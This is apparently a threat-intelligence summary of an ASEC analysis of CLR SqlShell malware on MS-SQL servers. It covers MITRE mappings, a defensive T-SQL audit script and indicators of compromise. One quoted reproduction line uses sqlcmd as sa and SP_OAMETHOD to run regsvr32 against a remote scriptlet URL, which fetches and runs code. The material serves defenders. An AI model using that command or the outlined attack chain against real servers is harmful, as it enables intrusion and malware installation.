Analysis of CLR SqlShell Used to Attack MS-SQL Servers – ASEC BLOG

CLR SqlShell is a DLL-based malware component used on compromised MS-SQL servers to run threat actor commands and carry out post-exploitation activity, including loading additional malware such as CoinMiner or ransomware. The article details how SqlShell variants abuse MS-SQL features to execute OS commands, download payloads, and escalate privileges, with examples tied to LemonDuck, ShadowForce, MyKings, and other families.

Keypoints

  • SqlShell refers to CLR Stored Procedure DLLs used on MS-SQL servers to execute commands and install further malware.
  • Attackers target poorly secured MS-SQL servers via external scanning (port 1433) and brute-force/dictionary logins with sa privileges.
  • OS-command execution on Windows through xp_cmdshell, OLE Stored Procedures, MS-SQL Agent Jobs, Extended Stored Procedures, and CLR Stored Procedures is a central attack vector.
  • LemonDuck and other families use CLR Stored Procedures (e.g., evilclr.dll, shaw20211224.dll) to download payloads and expand malware like CoinMiner.
  • ShadowForce (CLRSQL, CLR_module) leverages PingCastle integration for information gathering and privilege escalation within Active Directory-focused campaigns.
  • CoinMiner, proxyware, and downloader variants (MrbMiner, MyKings, LoveMiner) are commonly installed via SqlShells, often as droppers or downloaders.

MITRE Techniques

  • [T1059.003] Windows Command Shell – xp_cmdshell is used to execute commands in Windows shell via cmd.exe /c. Quote: ‘xp_cmdshell commands have a feature that executes commands received as arguments in Windows shell. Windows commands executed as xp_cmdshell commands are run via “cmd.exe /c” commands by the sqlservr.exe process.’
  • [T1117] Regsvr32 – OLE Automation Procedures leverage regsvr32 to load and execute DLLs (e.g., the reproduction showing regsvr32 usage). Quote: ‘CMD > sqlcmd -S [IP address] -U sa -P testsql… EXEC SP_OAMETHOD @shell,'run',null, 'regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll';’
  • [T1053] Scheduled Task – MS-SQL Agent Jobs register tasks that execute Windows commands. Quote: ‘MS-SQL Server Agent Jobs allows the registration of tasks that execute Windows commands.’
  • [T1129] Shared Modules – Extended Stored Procedure DLLs are registered and loaded to extend SQL Server capabilities. Quote: ‘Threat actors create malicious DLLs, register them with the sp_addextendedproc command, and then execute the export function of the DLLs to load the malicious DLL and run the export function responsible for malicious behavior.’
  • [T1059.007] JavaScript – Active Scripting supports using JS for scripts executed via SQL Server Agent or SqlShell. Quote: ‘the ActiveScripting method that makes it possible to use JS or VBS scripts.’
  • [T1059.008] VBScript – Active Scripting supports VBScript in addition to JavaScript. Quote: ‘the ActiveScripting method that makes it possible to use JS or VBS scripts.’
  • [T1055] Process Injection – Metasploit-based shellcode execution in memory (Meterpreter/backdoor) after loading SqlShell. Quote: ‘Metasploit installs the following SqlShell… responsible for executing the received shellcode in the memory of the sqlservr.exe process.’
  • [T1105] Ingress Tool Transfer – SqlShells download and install payloads from remote URLs. Quote: ‘downloaders that download and install malware from specific URLs.’
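A defender-side audit of the five execution paths listed above, as an added example that is not part of the ASEC post or this summary: T-SQL run by a sysadmin on the instance under review, assuming SQL Server 2016 or later so that HASHBYTES accepts the full varbinary(max) assembly content.

```sql
-- Added audit example (not from the ASEC post). Assumes sysadmin rights on the
-- instance and SQL Server 2016+ (HASHBYTES over varbinary(max)).

-- 1. Server switches behind xp_cmdshell, OLE Automation and CLR execution.
--    value_in_use = 1 means the feature is live; 'clr strict security' = 0
--    (SQL Server 2017+) lets UNSAFE assemblies load without a trusted signature.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures',
               'clr enabled', 'clr strict security');

-- 2. User-defined CLR assemblies in the current database, with the MD5 of
--    the stored DLL bytes so it can be matched against published file hashes.
--    A SqlShell needs UNSAFE_ACCESS to start cmd.exe from sqlservr.exe.
SELECT a.name, a.permission_set_desc, a.create_date,
       dp.name AS owner_principal,
       CONVERT(char(32), HASHBYTES('MD5', f.content), 2) AS dll_md5
FROM sys.assemblies a
JOIN sys.assembly_files f ON f.assembly_id = a.assembly_id AND f.file_id = 1
JOIN sys.database_principals dp ON dp.principal_id = a.principal_id
WHERE a.is_user_defined = 1;

-- 3. CLR procedures/functions that expose those assemblies to T-SQL callers.
SELECT o.name AS object_name, o.type_desc, a.name AS assembly_name,
       am.assembly_class, am.assembly_method
FROM sys.assembly_modules am
JOIN sys.objects o ON o.object_id = am.object_id
JOIN sys.assemblies a ON a.assembly_id = am.assembly_id
WHERE a.is_user_defined = 1;

-- 4. Extended stored procedures registered with sp_addextendedproc
--    (these live in master and point at a DLL on disk).
SELECT name, dll_name, create_date
FROM master.sys.extended_procedures
WHERE is_ms_shipped = 0;

-- 5. Agent job steps that run OS commands or Active Scripting.
SELECT j.name AS job_name, s.step_name, s.subsystem, s.command
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'ActiveScripting', 'PowerShell');
```

Run step 2 in every user database, not only the current one, since a CLR assembly is scoped to the database it was created in.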

Indicators of Compromise

  • [MD5] 383d20de8f94d12a6ded1e03f53c1e16 – LemonDuck (evilclr.dll) – Malware component used by LemonDuck
  • [MD5] 3e81a45507aea0945c57b67f193138a2 – Simple SqlShell (test.dll) – Sample DLL variant
  • [IP] 88.214.26.9:13785 – Metasploit Meterpreter C2
  • [Domain] vihansoft.ir:3341 – MrbMiner C2
  • [File name] evilclr.dll – LemonDuck CLR Shell
  • [File name] shaw20211224.dll – Shaw20211224 CLR Shell

Read more: https://asec.ahnlab.com/en/52479/